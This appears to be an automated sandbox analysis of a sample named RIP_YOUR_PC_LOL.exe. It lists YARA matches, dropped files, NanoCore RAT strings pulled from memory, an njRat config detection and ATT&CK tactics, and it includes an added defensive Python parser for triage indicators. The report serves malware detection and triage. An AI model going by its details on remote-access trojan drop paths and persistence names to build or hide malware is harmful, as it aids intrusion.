                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
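The match lists above (and the ones that follow) are the raw evidence an analyst turns into indicators: dropped-file paths to hunt for, process names and PIDs to pivot on, and unpacked or dumped regions to pull for static analysis. The parser below is an added example written for this page, not Joe Sandbox code, and it works on the flattened "Source: Yara matchFile source: ..., type: ..." form the lines take here. The `N.M.image.base.idx[.raw].unpack` and `.sdmp` name layouts are read off the entries on this page; treating the fifth and seventh dotted fields of an `.sdmp` name as a Win32 page protection and `MEMORY_BASIC_INFORMATION.Type` is an assumption (the constant values themselves are the documented Win32 ones), used here to flag RWX private regions such as the `00000007.00000002.468272297.00000000024F0000.00000040...` dump, which is where injected or unpacked payloads are normally found. The sample lines are copied from this report, with one deliberate duplicate.

```python
"""Turn flattened Joe Sandbox 'Yara match / File source' lines into triage IOCs."""
import re
from collections import defaultdict

# Constructed input: lines copied from the report in their flattened form,
# including one duplicate DROPPED entry to show de-duplication.
SAMPLE_LINES = [
    "Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR",
    "Source: Yara matchFile source: C:\\Users\\user\\AppData\\Roaming\\Opus.exe, type: DROPPED",
    "Source: Yara matchFile source: C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe, type: DROPPED",
    "Source: Yara matchFile source: C:\\Users\\user\\AppData\\Roaming\\Opus.exe, type: DROPPED",
    "Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY",
    "Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE",
    "Source: Yara matchFile source: dump.pcap, type: PCAP",
]

LINE_RE = re.compile(r"^Source: Yara match\s*File source: (?P<src>.+), type: (?P<type>[A-Z]+)\s*$")
PROC_RE = re.compile(r"^Process Memory Space: (?P<image>.+) PID: (?P<pid>\d+)$")
# <process index>.<stage>.<image name>.<hex base>.<index>[.raw].unpack ; the image
# name may itself contain dots and spaces, so it is matched greedily and the
# trailing hex/number fields anchor the split.
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+)\.(?P<base>[0-9a-fA-F]+)"
    r"\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$")
# <proc>.<stage>.<id>.<base>.<protect>.<f2>.<memtype>.<f4>.sdmp ; protect/memtype
# interpretation is an ASSUMPTION (see lead-in), the other two fields are kept raw.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<id>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<memtype>[0-9A-Fa-f]{8})"
    r"\.(?P<f4>[0-9A-Fa-f]{8})\.sdmp$")

# Documented Win32 constants (winnt.h); mapping them onto sdmp fields is the assumption.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_line(line):
    """Return a dict describing one match line, or None if the line is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, kind = m.group("src"), m.group("type")
    rec = {"type": kind, "source": src}
    if kind == "MEMORYSTR":
        p = PROC_RE.match(src)
        if p:
            rec.update(image=p.group("image"), pid=int(p.group("pid")))
    elif kind == "UNPACKEDPE":
        u = UNPACK_RE.match(src)
        if u:
            rec.update(proc=int(u.group("proc")), stage=int(u.group("stage")),
                       image=u.group("image"), base=int(u.group("base"), 16),
                       idx=int(u.group("idx")), raw=bool(u.group("raw")))
    elif kind == "MEMORY":
        s = SDMP_RE.match(src)
        if s:
            protect, memtype = int(s.group("protect"), 16), int(s.group("memtype"), 16)
            rec.update(proc=int(s.group("proc"), 16), base=int(s.group("base"), 16),
                       protect=PAGE_PROTECT.get(protect, hex(protect)),
                       memtype=MEM_TYPE.get(memtype, hex(memtype)),
                       # RWX private memory is the usual home of injected/unpacked code
                       suspicious_rwx=(protect == 0x40 and memtype == 0x20000))
    return rec


def summarize(lines):
    """Group parsed lines into a de-duplicated triage summary."""
    acc = {"dropped": set(), "processes": defaultdict(set), "unpacked": set(),
           "memory": set(), "rwx_regions": set(), "other": set()}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        t = rec["type"]
        if t == "DROPPED":
            acc["dropped"].add(rec["source"])
        elif t == "MEMORYSTR" and "pid" in rec:
            acc["processes"][rec["image"]].add(rec["pid"])
        elif t == "UNPACKEDPE" and "base" in rec:
            acc["unpacked"].add((rec["proc"], rec["image"], rec["base"], rec["raw"]))
        elif t == "MEMORY" and "base" in rec:
            acc["memory"].add((rec["proc"], rec["base"], rec["protect"], rec["memtype"]))
            if rec["suspicious_rwx"]:
                acc["rwx_regions"].add((rec["proc"], rec["base"]))
        else:
            acc["other"].add((t, rec["source"]))
    return {
        "dropped": sorted(acc["dropped"]),
        "processes": {k: sorted(v) for k, v in acc["processes"].items()},
        "unpacked": sorted(acc["unpacked"]),
        "memory": sorted(acc["memory"]),
        "rwx_regions": sorted(acc["rwx_regions"]),
        "other": sorted(acc["other"]),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_LINES), indent=2))
```

Feed it the whole report text (one line per entry) and the `dropped` list becomes the file-path hunt list, `processes` the PID pivots for the process tree, and `rwx_regions` the dumps worth opening first; the `.raw.unpack` flag distinguishes raw-layout dumps from the rebased ones when choosing which copy to load in a disassembler.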

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000014.00000003.641078460.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Source: healastounding.exeString found in binary or memory: NanoCore.ClientPluginHost
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: healastounding.exe, 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.703475232.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.703475232.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: Yara matchFile source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED
                    Source: gay.exe.4.dr, OK.cs.Net Code: njRat config detected
MITRE ATT&CK Matrix

Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact.

Techniques carrying a signature count (the count precedes the technique name):

Initial Access: 1 Replication Through Removable Media
Execution: 12 Native API; 1 Shared Modules; 2 Scheduled Task/Job
